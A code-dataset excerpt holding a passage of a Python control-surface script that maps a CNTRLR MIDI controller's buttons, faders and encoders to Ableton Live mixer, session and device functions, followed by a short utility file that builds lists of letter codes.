self._button[index].set_on_off_values(127, 0) #reset the on/off values for the key buttons
self._button[index].release_parameter() #remove the parameter assignment that was assigned to the keys
self._button[index].send_value(0, True) #turn the buttons LEDs off
#self._host._release_mod_dials()
#self._device.set_parameter_controls(tuple([self._encoder[index+4] for index in range(8)])) #assign the encoders from the device component controls - we are doing this here b
self._device_navigator.set_device_nav_buttons(None, None) #remove the assignment of the device nav buttons
self._device_navigator.set_enabled(False) #turn off the device navigator
self._device.set_on_off_button(None) #remove the assignment of the on/off button from the device component
self._device.set_lock_button(None) #remove the assignment of the lock button from the device component
self._device.set_bank_nav_buttons(None, None) #remove the assignment of the navigation buttons from the device component
self._device.set_enabled(False) #turn off the device component
self._session.set_enabled(False) #turn off the session component
self._session_zoom.set_enabled(False) #turn off the zoom component
for index in range(16):
self._grid[index].force_next_send() #set the last_sent value of the grid to -1, so that the next value it receives will always be transmitted to the CNTRLR
for index in range(32):
self._button[index].force_next_send() #set the last_sent value of the keys to -1, so that the next value it receives will always be transmitted to the CNTRLR
for index in range(12):
self._device._parameter_controls = None
self._encoder[index].release_parameter()
self._encoder[index].send_value(0, True) #turn off all the encoder rings. We send it the second argument, True, so that it is forced to update regardless of its last_sent property
self._encoder[index].force_next_send() #set the last_sent value of the encoder rings to -1, so that the next value it receives will always be transmitted to the CNTRLR
for index in range(8):
self._encoder_button[index+4].send_value(0, True) #turn off all the encoder LEDs. We send it the second argument, True, so that it is forced to update regardless of its last_sent property
self._encoder_button[index+4].force_next_send() #set the last_sent value of the encoder LEDs to -1, so that the next value it receives will always be transmitted to the CNTRLR
for index in range(8):
self._mixer2.channel_strip(index).set_select_button(None)
self._mixer2.channel_strip(index).set_mute_button(None)
self._mixer2.channel_strip(index).set_select_button(None)
self._session_zoom.set_zoom_button(None) #remove the assignment of the shift button from the ZoomingComponent
self.request_rebuild_midi_map() #now that we've finished deassigning all of our controls, we tell the main script to rebuild its MIDI map and update the values in Live
"""this assigns the CNTRLR's controls on the main mode the CNTRLR script boots up in"""
"""if you're trying to customize your layout, this is probably where you want to concentrate"""
def assign_live_controls(self):
"""the following lines update all of the controls' last_sent properties, so that they forward the next value they receive regardless of whether or not it is the same as the last it recieved"""
"""we also reset the encoder rings and buttons, since the device component will not update them if it is not locked to a device in Live"""
for index in range(16):
self._grid[index].force_next_send()
for index in range(32):
self._button[index].force_next_send()
for index in range(8):
self._encoder_button[index+4].send_value(0, True)
self._encoder_button[index+4].force_next_send()
for index in range(12):
self._encoder[index].send_value(0, True)
self._encoder[index].force_next_send()
"""here we assign the top encoders to the mod_dial, if it exists, in any connected mods"""
#self.schedule_message(4, self._host._assign_mod_dials)
self._host._assign_mod_dials()
"""here we assign the left side of our mixer's buttons on the lower 32 keys"""
if self._monohm == None and self._aumpush == None:
for index in range(4): #we set up a recursive loop to assign all four of our track channel strips' controls
self._button[index].set_on_value(SOLO[self._rgb]) #set the solo color from the Map.py
self._mixer.channel_strip(index).set_solo_button(self._button[index]) #assign the solo buttons to our mixer channel strips
self._button[index+4].set_on_value(ARM[self._rgb]) #set the arm color from the Map.py
self._mixer.channel_strip(index).set_arm_button(self._button[index+4]) #assign the arm buttons to our mixer channel strips
self._button[index+16].set_on_value(MUTE[self._rgb]) #set the mute color from the Map.py
self._mixer.channel_strip(index).set_mute_button(self._button[index+16]) #assign the mute buttons to our mixer channel strips
self._button[index+20].set_on_value(SELECT[self._rgb]) #set the select color from the Map.py
self._mixer.channel_strip(index).set_select_button(self._button[index+20]) #assign the select buttons to our mixer channel strips
self._send_reset.set_buttons(tuple(self._button[index + 8] for index in range(4))) #this is yet another way to quickly assign multiple elements conveniently in-place. We are creating a recursion inside an assignment. The tuple() method creates an immutable array. It can't be modified until it gets where it's going and is unpacked.
self._session.set_stop_track_clip_buttons(tuple(self._button[index+24] for index in range(4))) #these last two lines assign the send_reset buttons and the stop_clip buttons for each track
for index in range(4):
self._button[index+8].send_value(SEND_RESET[self._rgb], True) #now we are going to send a message to turn the LEDs on for the send_reset buttons
self._button[index + 24].set_on_off_values(STOP_CLIP[self._rgb], STOP_CLIP[self._rgb]) #this assigns the custom colors defined in the Map.py file to the stop_clip buttons. They have seperate on/off values, but we assign them both the same value so we can always identify them
self._button[index+24].send_value(STOP_CLIP[self._rgb], True) #finally, we send the on/off colors out to turn the LEDs on for the stop clip buttons
self._button[28].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb]) #assing the on/off colors for play. These are two seperate values, dependant upon whether play is engaged or not
self._transport.set_play_button(self._button[28]) #set the transports play control to the corresponding button on the CNTRLR
self._button[30].set_on_off_values(RECORD_ON[self._rgb], RECORD[self._rgb]) #set the on/off colors for the transport record buttons
self._transport.set_record_button(self._button[30]) #assign the correct button for the transport record control
self._button[29].set_on_value(STOP[self._rgb]) #set the on value for the Stop button
self._transport.set_stop_button(self._button[29]) #assign the correct button for the transport stop control
self._button[29].send_value(STOP_OFF[self._rgb], True) #turn on the LED for the stop button
for index in range(4): #set up a for loop to generate an index for assigning the session nav buttons' colors
self._button[index + 12].set_on_off_values(SESSION_NAV[self._rgb], SESSION_NAV_OFF[self._rgb]) #assign the colors from Map.py to the session nav buttons
self._session.set_track_bank_buttons(self._button[15], self._button[14]) #set the track bank buttons for the Session navigation controls
self._session.set_scene_bank_buttons(self._button[13], self._button[12]) #set the scnee bank buttons for the Session navigation controls
"""this section assigns the grid to the clip launch functionality of the SessionComponent"""
for column in range(4): #we need to set up a double recursion so that we can generate the indexes needed to assign the grid buttons
for row in range(4): #the first recursion passes the column index, the second the row index
self._scene[row].clip_slot(column).set_launch_button(self._grid[(row*4)+column]) #we use the indexes to grab the first the scene and then the clip we assigned above, and then we use them again to define the button held in the grid array that we want to assign to the clip slot from the session component
"""this section assigns the faders and knobs"""
for index in range(2):
self._mixer.return_strip(index).set_volume_control(self._fader[index+4]) #assign the right faders to control the volume of our return strips
self._mixer.master_strip().set_volume_control(self._fader[7]) #assign the far right fader to control our master channel strip
self._mixer.set_prehear_volume_control(self._fader[6]) #assign the remaining fader to control our prehear volume of the the master channel strip
for track in range(4): #we set up a recursive loop to assign all four of our track channel strips' controls
channel_strip_send_controls = [] #the channelstripcomponent requires that we pass the send controls in an array, so we create a local variable, channel_strip_send_controls, to hold them
for control in range(2): #since we are going to assign two controls to the sends, we create a recursion
channel_strip_send_controls.append(self._dial_left[track + (control * 4)]) #then use the append __builtin__ method to add them to the array
self._mixer.channel_strip(track).set_volume_control(self._fader[track]) #Since we gave our mixer 4 tracks above, we'll now assign our fader controls to it
self._mixer.channel_strip(track).set_send_controls(tuple(channel_strip_send_controls)) #now that we have an array containing the send controls, we pass it to the channelstrip component with its set_send_controls() method
self._mixer.channel_strip(track).set_pan_control(self._dial_left[track + 8]) #now we set the pan control to the bottom
self._mixer.track_eq(track).set_gain_controls(tuple([self._dial_right[track+8], self._dial_right[track+4], self._dial_right[track]])) #here's another way of doing the same thing, but instead of creating the array before hand, we define it in-place. Its probably bad coding to mix styles like this, but I'll leave it for those of you trying to figure this stuff out
self._mixer.track_eq(track).set_enabled(True) #turn the eq component on
self._session_zoom.set_zoom_button(self._button[31]) #assign the lower right key button to the shift function of the Zoom component
self._session.update() #tell the Session component to update so that the grid will display the currently selected session region
self._session.set_enabled(True) #enable the Session Component
self._session_zoom.set_enabled(True) #enable the Session Zoom
elif not self._aumpush == None:
self.assign_aumpush_controls()
elif not self._monohm == None:
for index in range(8):
self._mixer2.channel_strip(index).set_volume_control(self._fader[index])
self._mixer2.set_track_offset(TROLL_OFFSET)
self._device_selector.set_mode_buttons(tuple(self._grid))
self._device_selector.set_enabled(True)
if not self._shifted:
self._assign_monomodular_controls()
else:
self._assign_shifted_controls()
self._device1.set_parameter_controls(tuple([self._knobs[index] for index in range(8)]))
self._device2.set_parameter_controls(tuple([self._knobs[index+12] for index in range(8)]))
self._device1.set_enabled(True)
self._device2.set_enabled(True)
self._find_devices()
self._device1.update()
self._device2.update()
"""this section assigns the encoders and encoder buttons"""
if self._aumpush == None:
self._device.set_parameter_controls(tuple([self._encoder[index+4] for index in range(8)])) #assign the encoders from the device component controls - we are doing this here b
self._encoder_button[7].set_on_value(DEVICE_LOCK[self._rgb]) #set the on color for the Device lock encoder button
self._device.set_lock_button(self._encoder_button[7]) #assign encoder button 7 to the device lock control
self._encoder_button[4].set_on_value(DEVICE_ON[self._rgb]) #set the on color for the Device on/off encoder button
self._device.set_on_off_button(self._encoder_button[4]) #assing encoder button 4 to the device on/off control
for index in range(2): #setup a recursion to generate indexes so that we can reference the correct controls to assing to the device_navigator functions
self._encoder_button[index + 8].set_on_value(DEVICE_NAV[self._rgb]) #assign the on color for the device navigator
self._encoder_button[index + 10].set_on_value(DEVICE_BANK[self._rgb]) #assign the on color for the device bank controls
self._device_navigator.set_device_nav_buttons(self._encoder_button[10], self._encoder_button[11]) #set the device navigators controls to encoder buttons 10 and 11
self._device.set_bank_nav_buttons(self._encoder_button[8], self._encoder_button[9]) #set the device components bank nav controls to encoder buttons 8 and 9
"""now we turn on and update some of the components we've just made assignments to"""
self._device.set_enabled(True) #enable the Device Component
self._device_navigator.set_enabled(True) #enable the Device Navigator
self._device.update() #tell the Device component to update its assingments so that it will detect the currently selected device parameters and display them on the encoder rings
"""this assigns the CNTRLR's controls on for 4th empty modSlot"""
"""these assignments mirror the main section; commenting is restricted to the differences"""
def assign_chopper_controls(self):
"""the following lines update all of the controls' last_sent properties, so that they forward the next value they receive regardless of whether or not it is the same as the last it recieved"""
"""we also reset the encoder rings and buttons, since the device component will not update them if it is not locked to a device in Live"""
for index in range(16):
self._grid[index].force_next_send()
for index in range(32):
self._button[index].force_next_send()
for index in range(8):
self._encoder_button[index+4].send_value(0, True)
self._encoder_button[index+4].force_next_send()
for index in range(12):
self._encoder[index].send_value(0, True)
self._encoder[index].force_next_send()
"""here we assign the top encoders to the mod_dial, if it exists, in any connected mods"""
#self.schedule_message(4, self._host._assign_mod_dials)
self._host._assign_mod_dials()
"""the following lines differ from the assignments in self.assign_live_controls()"""
"""the assignments merely moving certain elements from their original positions"""
for index in range(4):
self._button[index].set_on_value(MUTE[self._rgb])
self._mixer.channel_strip(index).set_mute_button(self._button[index])
self._button[index+4].set_on_value(SELECT[self._rgb])
self._mixer.channel_strip(index).set_select_button(self._button[index+4])
self._session.set_stop_track_clip_buttons(tuple(self._button[index+8] for index in range(4)))
for index in range(4):
self._button[index + 8].set_on_off_values(STOP_CLIP[self._rgb], STOP_CLIP[self._rgb])
self._button[index+8].send_value(STOP_CLIP[self._rgb], True)
for index in range(4):
self._button[index + 12].set_on_off_values(SESSION_NAV[self._rgb], SESSION_NAV_OFF[self._rgb])
self._session.set_scene_bank_buttons(self._button[13], self._button[12])
self._session.set_track_bank_buttons(self._button[15], self._button[14])
"""the rest of this method mirrors self._assign_live_controls, comments can be found there"""
for index in range(2):
self._mixer.return_strip(index).set_volume_control(self._fader[index+4])
self._mixer.master_strip().set_volume_control(self._fader[7])
self._mixer.set_prehear_volume_control(self._fader[6])
for track in range(4):
channel_strip_send_controls = []
for control in range(2):
channel_strip_send_controls.append(self._dial_left[track + (control * 4)])
self._mixer.channel_strip(track).set_send_controls(tuple(channel_strip_send_controls))
self._mixer.channel_strip(track).set_pan_control(self._dial_left[track + 8])
gain_controls = []
self._mixer.track_eq(track).set_gain_controls(tuple([self._dial_right[track+8], self._dial_right[track+4], self._dial_right[track]]))
self._mixer.track_eq(track).set_enabled(True)
for column in range(4):
for row in range(4):
self._scene[row].clip_slot(column).set_launch_button(self._grid[(row*4)+column])
self._encoder_button[7].set_on_value(DEVICE_LOCK[self._rgb])
self._device.set_lock_button(self._encoder_button[7])
self._encoder_button[4].set_on_value(DEVICE_ON[self._rgb])
self._device.set_on_off_button(self._encoder_button[4])
for index in range(2):
self._encoder_button[index + 8].set_on_value(DEVICE_NAV[self._rgb])
self._encoder_button[index + 10].set_on_value(DEVICE_BANK[self._rgb])
self._device_navigator.set_device_nav_buttons(self._encoder_button[10], self._encoder_button[11])
self._device.set_bank_nav_buttons(self._encoder_button[8], self._encoder_button[9])
self._device.set_enabled(True)
self._device_navigator.set_enabled(True)
self._session.set_enabled(True)
self._session_zoom.set_enabled(True)
self._device.update()
self._session.update()
self.request_rebuild_midi_map()
"""function mode callbacks"""
"""this method changes modes when we press a modButton. It is also called from Monomod when it needs to update the modDial assignments"""
def shift_update(self):
#self.log_message('shift_update')
#deassign current assignments and reset channel translation to 0
self.assign_alternate_mappings(0) #first, we remove any channel reassingments we might have made by assigning alternate mappings, but to channel 0 (the original channel)
self._chopper.set_enabled(False) #disable the chopper, we will enable it later if we are in chopper mode
#update top button row to reflect current mode
if self._shift_mode._mode_index is 0: #if the shift mode is 0, meaning we've selecte the main script mode:
self._host._set_dial_matrix(None, None) #deassign the Monomod Components dial matrix
#self._host._set_knobs(None)
self._host._set_button_matrix(None) #deassign the Monomod Component's button matrix
self._host._set_key_buttons(None) #deassign the Monomod Component's key matrix
self._host.set_enabled(False) #disable the Monomod Component
#self.set_local_ring_control(1) #send sysex to the CNTRLR to put it in local ring mode
self.deassign_live_controls()
#self.assign_live_controls() #assign our top level control assignments
self.schedule_message(1, self.assign_live_controls)
self.schedule_message(1, self._host._display_mod_colors)
elif CHOPPER_ENABLE and not self._host._client is None and not self._host._client[3].is_connected() and self._shift_mode._mode_index == 4: #if the fourth mod button has been pressed and there is no mod installed
self.deassign_live_controls() #deassign the top level assignments
#self.schedule_message(4, self._host._assign_mod_dials)
self._host._assign_mod_dials()
self._host._set_dial_matrix(None, None) #deassign the Monomod Components dial matrix
self._host._set_button_matrix(None) #deassign the Monomod Component's button matrix
self._host._set_key_buttons(None) #deassign the Monomod Component's key matrix
self._host.set_enabled(False) #disable the Monomod Component
self.set_local_ring_control(1) #send sysex to the CNTRLR to put it in local ring mode
self.assign_chopper_controls() #assign the controls for the Chopper Component
self._chopper.set_enabled(True) #turn the Chopper Component on
self._host._display_mod_colors()
self._shift_mode._modes_buttons[3].send_value(8) #turn on the LED below the modButton
else: #otherwise, if we are in modMode
self.deassign_live_controls() #remove all of our assignments from the controls and refresh their caches
if self._aumpush == None:
for index in range(8):
self._mixer2.channel_strip(index).set_volume_control(self._fader[index])
self._mixer2.set_track_offset(TROLL_OFFSET)
self._device1.set_parameter_controls(tuple([self._knobs[index] for index in range(8)]))
self._device2.set_parameter_controls(tuple([self._knobs[index+12] for index in range(8)]))
self._device1.set_enabled(True)
self._device2.set_enabled(True)
self._find_devices()
self._device1.update()
self._device2.update()
else:
self.assign_aumpush_controls()
if self._host._client is None or not self._host._client[self._shift_mode._mode_index-1].is_connected(): #if there is not a mod in the currently selected modSlot
self.assign_alternate_mappings(self._shift_mode._mode_index) #assign a different MIDI channel that the controls translated to when entering Live
for index in range(4):
self._shift_mode._modes_buttons[index].send_value(self._shift_mode._mode_index == (index+1))
else:
self._host._set_button_matrix(self._matrix) #assign the 4x4 to it
self._host._set_dial_matrix(self._dial_matrix, self._dial_button_matrix) #assign the encoders to it
if not self._shifted is True:
#self.log_message('setting keys')
self._host._set_key_buttons(tuple(self._button)) #assign the lower buttons to it
if(self._host._active_client._monomodular > 0):
if self._aumpush is None:
#self.log_message('but monomod > 0')
self._assign_monomodular_controls()
else:
#self.log_message('self._shifted is True')
self._host._set_key_buttons(None)
self._assign_shifted_controls()
self._host._select_client(self._shift_mode._mode_index-1) #select the client corresponding to the button we pressed
if self._suppress_next_mod_display:
self._suppress_next_mod_display = False
else:
self._host.display_active_client() #tell Monomod Component to update the LEDs on the CNTRLR corresponding to the client that is selected
self._host.set_enabled(True) #turn on the Monomod Component
self._host._display_mod_colors()
def find_inputs(self):
found_device = None
tracks = self.song().tracks
for track in tracks:
if track.name == 'Inputs':
for device in track.devices:
if bool(device.can_have_chains) and device.name == 'Inputs':
found_device = device
return found_device
def find_perc_crossfader(self):
found_parameter = None
tracks = self.song().tracks
for track in tracks:
if track.name == 'Perc':
for device in track.devices:
if bool(device.can_have_chains) and device.name == 'Perc':
for parameter in device.parameters:
if parameter.name == 'XFade':
found_parameter = parameter
return found_parameter
def assign_aumpush_controls(self):
if self._aumpush:
inputs = self.find_inputs()
if not inputs is None:
for index in range(4):
self._knobs[index+8].connect_to(inputs.parameters[index+1])
#for index in range(3):
# self._mixer2.channel_strip(index+4).set_volume_control(self._knobs[index+20])
self._mixer.set_crossfader_control(self._knobs[23])
xfade = self.find_perc_crossfader()
if not xfade is None:
self._knobs[20].connect_to(xfade)
for index in range(4):
self._mixer3.return_strip(index).set_volume_control(self._encoder[index+4])
self._encoder_button[index+4].send_value(127, True)
if self._shift_mode._mode_index is 0:
self._on_shift_button_value.subject = self._grid[15]
if self._aumpush._host._is_connected:
self._aumpush._host._set_bank_buttons(tuple(self._button[4:12]+self._button[20:28]))
#for index in range(8):
# self._button[index+4].set_on_off_values(SELECT[self._rgb], (5, 6)[int(index>3)])
# self._mixer2.channel_strip(index).set_select_button(self._button[index+4])
for index in range(4):
self._send_reset.set_buttons(tuple(self._encoder_button[4:8]))
self._button[index].set_on_off_values(SELECT[self._rgb], 1)
self._mixer.channel_strip(index).set_select_button(self._button[index])
self._mixer.channel_strip(index).set_mute_button(self._button[index+16])
self._button[index+12].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index).set_select_button(self._button[index+12])
self._mixer2.channel_strip(index).set_mute_button(self._button[index+28])
if not self._shifted:
self._mixer.selected_strip().set_send_controls(self._encoder[8:12])
for index in range(4):
self._encoder_button[index+8].send_value(3, True)
else:
self._mixer.return_strip(0).set_send_controls(tuple([None, self._encoder[8]]))
self._mixer.return_strip(1).set_send_controls(tuple([self._encoder[9], None]))
#self._mixer.set_crossfader_control(self._encoder[11])
self._mixer3.channel_strip(0).set_volume_control(self._encoder[11])
self._encoder_button[8].send_value(5, True)
self._encoder_button[9].send_value(5, True)
self._encoder_button[11].send_value(1, True)
for index in range(4):
self._mixer.channel_strip(index).set_volume_control(self._fader[index])
self._mixer2.channel_strip(index).set_volume_control(self._fader[index+4])
self._device1.set_parameter_controls(tuple([self._knobs[index] for index in range(8)]))
self._device2.set_parameter_controls(tuple([self._knobs[index+12] for index in range(8)]))
self._device1.set_enabled(True)
self._device2.set_enabled(True)
self._find_devices()
self._device1.update()
self._device2.update()
self._device_selector.set_mode_buttons(tuple(self._grid[:15]))
self._device_selector.set_enabled(True)
self._device_selector.update()
self.request_rebuild_midi_map()
"""used to connect different control_surfaces so that they can communicate"""
def connect_script_instances(self, instanciated_scripts):
if AUMPUSH_LINK is True:
link = False
for s in instanciated_scripts:
#self.log_message('script check' + str(s))
if link == False:
#self.log_message(str(type(s)))
if '_cntrlr_version' in dir(s):
if s._cntrlr_version == self._monomod_version and s._host_name == 'AumPush':
link = True
with self.component_guard():
self._connect_aumpush(s)
break
elif MONOHM_LINK is True:
link = False
for s in instanciated_scripts:
#self.log_message('script check' + str(s))
if link == False:
#self.log_message(str(type(s)))
if '_cntrlr_version' in dir(s):
if s._cntrlr_version == self._monomod_version:
link = True
with self.component_guard():
self._connect_monohm(s)
break
"""device component methods and overrides"""
"""this closure replaces the default DeviceComponent update() method without requiring us to build an override class"""
"""it calls the _update_selected_device method of this script in addition to its normal routine"""
"""it also ensures a rebuilt midi_map; for some reason the Abe's pulled that part out of the post 8.22 scripts, and under certain circumstances"""
"""things don't work as expected anymore."""
def _device_update(self, device):
def _update():
#for client in self._client:
# if (device._device != None) and (client.device == device._device):
# device._bank_index = max(client._device_component._cntrl_offset, device._bank_index)
DeviceComponent.update(device)
self.request_rebuild_midi_map()
return _update
def _device_set_device(self, device_component):
def set_device(device):
is_monodevice = False
for client in self._client:
if (device != None) and (client.device == device):
is_monodevice = client
if is_monodevice != False:
#device = client._device_component._device
#self.log_message('is monodevice' + str(device.name))
assert ((device == None) or isinstance(device, Live.Device.Device))
if ((not device_component._locked_to_device) and (device != device_component._device)):
if (device_component._device != None):
device_component._device.remove_name_listener(device_component._on_device_name_changed)
device_component._device.remove_parameters_listener(device_component._on_parameters_changed)
parameter = device_component._on_off_parameter()
if (parameter != None):
parameter.remove_value_listener(device_component._on_on_off_changed)
if (device_component._parameter_controls != None):
for control in device_component._parameter_controls:
control.release_parameter()
device_component._device = device
if (device_component._device != None):
device_component._bank_index = 0
device_component._device.add_name_listener(self._on_device_name_changed)
device_component._device.add_parameters_listener(self._on_parameters_changed)
parameter = device_component._on_off_parameter()
if (parameter != None):
parameter.add_value_listener(device_component._on_on_off_changed)
for key in device_component._device_bank_registry.keys():
if (key == device_component._device):
device_component._bank_index = device_component._device_bank_registry.get(key, 0)
del device_component._device_bank_registry[key]
break
device_component._bank_name = '<No Bank>' #added
device_component._bank_index = max(is_monodevice._cntrl_offset, device_component._bank_index)
device_component._on_device_name_changed()
device_component.update()
else:
DeviceComponent.set_device(device_component, device)
return set_device
"""this closure replaces the default ChannelStripComponent _on_cf_assign_changed() method without requiring us to build an override class"""
"""it allows us to change different colors to its assigned controls based on the crossfade assignment, which the default _Framework doesn't support"""
def mixer_on_cf_assign_changed(self, channel_strip):
def _on_cf_assign_changed():
if (channel_strip.is_enabled() and (channel_strip._crossfade_toggle != None)):
if (channel_strip._track != None) and (channel_strip._track in (channel_strip.song().tracks + channel_strip.song().return_tracks)):
if channel_strip._track.mixer_device.crossfade_assign == 1: #modified
channel_strip._crossfade_toggle.turn_off()
elif channel_strip._track.mixer_device.crossfade_assign == 0:
channel_strip._crossfade_toggle.send_value(1)
else:
channel_strip._crossfade_toggle.send_value(2)
return _on_cf_assign_changed
"""a closure fix for banking when we deassign the bank buttons and still want to change bank indexes"""
def device_is_banking_enabled(self, device):
def _is_banking_enabled():
return True
return _is_banking_enabled
"""alt_build methods used when Monomodular capable controller is used in conjunction with the CNTRLR"""
"""monohm connectivity methods"""
"""this is called by connect_script_instances() when a MonOhm script is found to be installed"""
def _connect_monohm(self, monohm):
self.log_message('_connect_monohm')
self._monohm = monohm
self._monohm._cntrlr = self
self._mixer2.set_track_offset(TROLL_OFFSET)
#self.set_device_component(self._monohm._device)
"""if '_monohm_shift' in dir(monohm):
if self._monohm._shift_mode.mode_index_has_listener(monohm._monohm_shift):
self._monohm._shift_mode.remove_mode_index_listener(monohm._monohm_shift)
else:
monohm._monohm_shift = lambda: self._monohm_shift
self._monohm._shift_mode.add_mode_index_listener(monohm._monohm_shift)"""
#self._monohm._r_function_mode.set_enabled(True)
self._monohm._shift_mode._mode_index = 3
self._monohm._shift_mode.update()
self._monohm._r_function_mode._mode_index = TROLL_RIGHT_MODE
self._monohm._r_function_mode.update()
self._monohm._shift_mode._mode_index = 0
self._monohm._session_main.set_offsets(TROLL_MAIN_OFFSET, self._monohm._session_main._scene_offset)
self._monohm.schedule_message(10, self._monohm._shift_mode.update)
#self.deassign_live_controls()
#self.shift_update()
self._monohm_shift(0)
"""this is called by connect_script_instances() when a AumPush script is found to be installed"""
def _connect_aumpush(self, aumpush):
self.log_message('AumTroll connecting to AumPush...')
self._aumpush = aumpush
self._aumpush._cntrlr = self
with self.component_guard():
self.deassign_live_controls()
self.schedule_message(3, self.assign_live_controls)
#self._device_selector.update = self._make_device_selector_update(self._device_selector)
def _make_device_selector_update(self, selector):
def update():
key = str('p'+ str(selector._mode_index + 1) + ' ')
preset = None
for track in range(len(self.song().tracks)):
for device in range(len(self.song().tracks[track].devices)):
if(match(key, str(self.song().tracks[track].devices[device].name)) != None):
preset = self.song().tracks[track].devices[device]
for return_track in range(len(self.song().return_tracks)):
for device in range(len(self.song().return_tracks[return_track].devices)):
if(match(key, str(self.song().return_tracks[return_track].devices[device].name)) != None):
preset = self.song().return_tracks[return_track].devices[device]
for device in range(len(self.song().master_track.devices)):
if(match(key, str(self.song().master_track.devices[device].name)) != None):
preset = self.song().master_track.devices[device]
if(preset != None):
self.set_appointed_device(preset)
self.song().view.select_device(preset)
selector._last_preset = selector._mode_index
for button in selector._modes_buttons:
if selector._modes_buttons.index(button) == selector._mode_index:
button.turn_on()
else:
button.turn_off()
return update
def display_active_client(self):
if(not self._device._device is None):
#self.log_message('selecting....')
self.song().view.select_device(self._device._device)
if ((not self.application().view.is_view_visible('Detail')) or (not self.application().view.is_view_visible('Detail/DeviceChain'))):
self.application().view.show_view('Detail')
self.application().view.show_view('Detail/DeviceChain')
"""these two secondary DeviceComponents are only set up if the MONOHM_LINK flag in .Map is turned on"""
def _setup_alt_device_control(self):
self._device1 = DeviceComponent()
self._device1.name = 'Device_Component1'
self._device2 = DeviceComponent()
self._device2.name = 'Device_Component2'
"""this method is used to find the devices the alt controls will latch to"""
def _find_devices(self):
if self._device1:
if len(self.song().return_tracks) > 0:
if len(self.song().return_tracks[0].devices) > 0:
#self._device.set_device(self.song().return_tracks[0].devices[0])
if self._device1._locked_to_device:
self._device1.set_lock_to_device(False, self._device1._device)
self._device1.set_lock_to_device(True, self.song().return_tracks[0].devices[0])
if self._device2:
if len(self.song().return_tracks) > 1:
if len(self.song().return_tracks[1].devices) > 0:
#self._device2.set_device(self.song().return_tracks[1].devices[0])
if self._device2._locked_to_device:
self._device2.set_lock_to_device(False, self._device2._device)
self._device2.set_lock_to_device(True, self.song().return_tracks[1].devices[0])
#self.log_message('find devices')
"""this secondary MixerComponent is only set up if the MONOHM_LINK flag in .Map is turned on"""
def _setup_alt_mixer(self):
is_momentary = True
self._num_tracks = (8) #A mixer is one-dimensional
self._mixer2 = MixerComponent(8, 0, False, False)
self._mixer2.name = 'Mixer_2'
self._mixer2.set_track_offset(4) #Sets start point for mixer strip (offset from left)
for index in range(8):
self._mixer2.channel_strip(index).name = 'Mixer_2_ChannelStrip_' + str(index)
self._mixer2.channel_strip(index)._invert_mute_feedback = True
self._mixer3 = MixerComponent(4, 4, False, False)
self._mixer3.name = 'Mixer_3'
self._mixer3.set_track_offset(8) #Sets start point for mixer strip (offset from left)
for index in range(4):
self._mixer3.channel_strip(index).name = 'Mixer_3_ChannelStrip_' + str(index)
self._mixer3.channel_strip(index)._invert_mute_feedback = True
def _setup_pedal(self):
self._pedal = [None for index in range(8)]
if self._use_pedal is True:
for index in range(7):
self._pedal[index] = LoopPedalButtonElement(MIDI_CC_TYPE, 0, 33+index, Live.MidiMap.MapMode.absolute)
self._pedal[index].name = 'Pedal_'+str(index)
self._pedal[index]._report = False
self._pedal[7] = LoopPedalExpressionElement(self, MIDI_CC_TYPE, 0, 40, Live.MidiMap.MapMode.absolute)
self._pedal[7].name = 'Pedal_'+str(7)
self._pedal[7]._report = False
"""this method is used instead of an unbound method so that another script (MonOhm) can have access to the CNTRLR's methods"""
def _create_monohm_shift(self):
def _monohm_shift(mode):
#self.log_message('block monohm shift ' + str(mode))
self._shifted = mode > 1
self._suppress_next_mod_display = True
self.shift_update()
return _monohm_shift
def _assign_monomodular_controls(self):
#self.log_message('assign mod controls')
if self._monohm != None:
self._monohm._host._set_key_buttons(tuple(self._button[4:12]))
self._monohm._host._set_bank_buttons(tuple(self._button[16:32]))
for index in range(4):
self._button[index].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index).set_select_button(self._button[index])
self._button[index+12].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index+4).set_select_button(self._button[index+12])
def _deassign_monomodular_controls(self):
#self.log_message('deassign mod controls')
if self._monohm != None:
self._monohm._host._set_key_buttons(None)
self._monohm._host._set_bank_buttons(None)
for index in range(8):
self._mixer2.channel_strip(index).set_select_button(None)
def _assign_shifted_controls(self):
if self._monohm != None:
self._monohm._host._set_key_buttons(tuple(self._button[4:12]))
for index in range(4):
self._button[index].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index).set_select_button(self._button[index])
self._button[index+12].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index+4).set_select_button(self._button[index+12])
self._button[index+16].set_on_off_values(MUTE[self._rgb], 0)
self._mixer2.channel_strip(index).set_mute_button(self._button[index+16])
self._button[index+28].set_on_off_values(MUTE[self._rgb], 0)
self._mixer2.channel_strip(index+4).set_mute_button(self._button[index+28])
def tick(self):
self._chopper.get_pos()
def _assign_mod_dials(self):
pass
@subject_slot('value')
def _on_shift_button_value(self, value):
shifted = value > 0
if not self._shifted is shifted:
self._shifted = shifted
self.deassign_live_controls()
self.assign_live_controls()
if self._shifted and self._on_shift_button_value.subject:
self._on_shift_button_value.subject.send_value(12, True)
# a | [
"[email protected]"
] | |
de99e3d6b96f3f3cf71cfa5b5de8e5d4dcdaecfe | e0677fc5cfa9e1e863feac6552e51c07091301c9 | /build/lib/patata/utilities.py | e822d4f4168c15e1af37d6850a6fd7817c7e6357 | [] | no_license | helendragon/SBI_Project | 084383d50b5b58f5cbdc857d021ab1f9e93c6eed | a1cbffbb635c3ae1543eb09b2a0afaab85297e12 | refs/heads/master | 2020-05-03T17:26:27.419496 | 2019-04-01T02:41:40 | 2019-04-01T02:41:40 | 178,743,703 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | llista_lletres= ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S",
"T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l"
, "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"]
llista_lletres2=[]
llista_lletres2= [element+element2 for element in llista_lletres for element2 in llista_lletres]
merged_list= llista_lletres + llista_lletres2
| [
"[email protected]"
] | |
